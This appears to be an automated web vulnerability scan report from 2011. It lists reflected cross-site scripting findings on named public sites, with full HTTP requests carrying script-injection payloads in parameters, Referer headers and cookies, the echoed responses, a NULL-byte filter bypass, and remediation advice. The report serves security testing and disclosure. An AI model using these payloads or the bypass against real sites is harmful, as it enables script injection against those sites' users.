<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="description" content="Reimage specializes in 100% Windows OS repair."> <link href="cs ...[SNIP]... <img src="/track_new/track.php?tracking=Neudesic69f18"><script>alert(1)</script>602f708c63d&campaign=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct" width="1" height="1" /> ...[SNIP]...
5.338. http://www.scientificamerican.com/blog/observations/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.scientificamerican.com
Path:
/blog/observations/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9edcb"><a>429173c9aec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/observations/?9edcb"><a>429173c9aec=1 HTTP/1.1 Host: www.scientificamerican.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the blipid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 38e68(a)38972b8eede was submitted in the blipid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a.z?s=143&p=3&blipid=1456838e68(a)38972b8eede HTTP/1.1 Host: www.scout.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.3.9.1296350699791
Response
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Sun, 30 Jan 2011 01:27:20 GMT Content-Type: text/html; charset=utf-8 Expires: Sun, 30 Jan 2011 01:37:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 X-Streamed: from 192.168.20.186 in 14 ms Vary: Accept-Encoding Content-Length: 2434
<!-- ERROR in function: "Page_Init()" - Local date/time : Saturday, January 29, 2011 5:27:20 PM - Source : System.Data - Message : Failed to convert parameter value from a String to a Int32. - message : undefined - Number : 0 - Description : undefined - description : undefined - URL: s=143&p=3&blipid=1456838e68(a)38972b8eede - Remote IP : 192.168.10.129 - Referrer URL : - Server IP: 192.168.20.77, SPRUCE - MachineName: SPRUCE - Stack Trace: at System.Data.SqlClient.SqlParameter.CoerceValue(Object v ...[SNIP]...
The value of the EdpNo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003cb51"><a>6308be81e2 was submitted in the EdpNo parameter. This input was echoed as 3cb51"><a>6308be81e2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /applications/SearchTools/item-details.asp?EdpNo=6532393%003cb51"><a>6308be81e2 HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the EdpNo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ac78'%3balert(1)//e5661d759a9 was submitted in the EdpNo parameter. This input was echoed as 2ac78';alert(1)//e5661d759a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /applications/SearchTools/item-details.asp?EdpNo=65323932ac78'%3balert(1)//e5661d759a9 HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the EdpNo request parameter is copied into an HTML comment. The payload %0010a05--><a>cede825acff was submitted in the EdpNo parameter. This input was echoed as 10a05--><a>cede825acff in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /applications/SearchTools/item-details.asp?EdpNo=6532393%0010a05--><a>cede825acff HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the EdpNo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 796d4'%3balert(1)//5a2dd2f7153 was submitted in the EdpNo parameter. This input was echoed as 796d4';alert(1)//5a2dd2f7153 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(1)//5a2dd2f7153 HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<input type="hidden" name="hPayMthdBB" value="False" /> <SCRIPT LANGUAGE="javascript"> popWinGen = ""; function loadWindowGen(newTarget, newWidth, n ...[SNIP]... </a>'); }
function ReviewSort(robj) { this.location ='/applications/searchtools/item-details.asp?EdpNo=' +'6532393796d4';alert(1)//5a2dd2f7153'+ '&RSort=' +robj.value+ '&csid=ITD&body=#ReviewStart' }
//The following 2 functions have to do with the In-store Avail popup div - case 61721 document.onclick = checkClickedElement; function c ...[SNIP]...
5.344. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.tigerdirect.com
Path:
/applications/SearchTools/item-details.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload %00bb0c0--><a>d595b8102fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb0c0--><a>d595b8102fc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /applications/SearchTools/item-details.asp?%00bb0c0--><a>d595b8102fc=1 HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<input type="hidden" name="hPayMthdBB" value="False" /> <SCRIPT LANGUAGE="javascript"> popWinGen = ""; function loadWindowGen(newTarget, newWidth, ne ...[SNIP]... <!--Cart(Landing) :http://www.tigerdirect.com/applications/SearchTools/item-details.asp?%00bb0c0--><a>d595b8102fc=1--> ...[SNIP]...
5.345. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.tigerdirect.com
Path:
/applications/SearchTools/item-details.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00eb8c3"><a>a3bb50b2646 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb8c3"><a>a3bb50b2646 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /applications/SearchTools/item-details.asp?%00eb8c3"><a>a3bb50b2646=1 HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb03c</script><script>alert(1)</script>39657643a5f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: msn.whitepages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=eb03c</script><script>alert(1)</script>39657643a5f
The value of the Referer HTTP header is copied into an HTML comment. The payload a183e--><script>alert(1)</script>a0c510cb4bc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /applications/SearchTools/item-details.asp?EdpNo=6532393 HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=a183e--><script>alert(1)</script>a0c510cb4bc
The value of the Referer HTTP header is copied into an HTML comment. The payload cc810--><script>alert(1)</script>429fd582109 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /applications/SearchTools/item-details.asp HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=cc810--><script>alert(1)</script>429fd582109
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 92d4b<script>alert(1)</script>adf0fa9a0ac was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-129445681092d4b<script>alert(1)</script>adf0fa9a0ac
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 30 Jan 2011 01:40:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:25 2011&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:40:25 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296351625; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26537
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454",Pid:"p85001580",Arc:"40401740",Location:CO ...[SNIP]... ); }else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload); }}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-129445681092d4b<script>alert(1)</script>adf0fa9a0ac', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan ...[SNIP]...
The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload 1be22<script>alert(1)</script>85d24c2bcc4 was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&1be22<script>alert(1)</script>85d24c2bcc4; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 30 Jan 2011 01:40:24 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:24 2011&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:40:24 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296351624; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26537
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454",Pid:"p85001580",Arc:"40401740",Location:CO ...[SNIP]... 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&1be22<script>alert(1)</script>85d24c2bcc4', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p85001580": 'exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23: ...[SNIP]...
The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload c6787<script>alert(1)</script>17fd908bc32 was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&c6787<script>alert(1)</script>17fd908bc32; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 30 Jan 2011 01:40:23 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:23 2011&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:40:23 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296351623; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26537
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454",Pid:"p85001580",Arc:"40401740",Location:CO ...[SNIP]... oad); }}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&c6787<script>alert(1)</script>17fd908bc32', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sa ...[SNIP]...
The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 2a025<script>alert(1)</script>d7c608ef8ac was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&2a025<script>alert(1)</script>d7c608ef8ac; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 30 Jan 2011 01:40:24 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:24 2011&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:40:24 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296351624; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26537
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454",Pid:"p85001580",Arc:"40401740",Location:CO ...[SNIP]... t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&2a025<script>alert(1)</script>d7c608ef8ac' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.com/$|zone.redacted|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http ...[SNIP]...
The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 9b8c5<script>alert(1)</script>dd9b7d29648 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
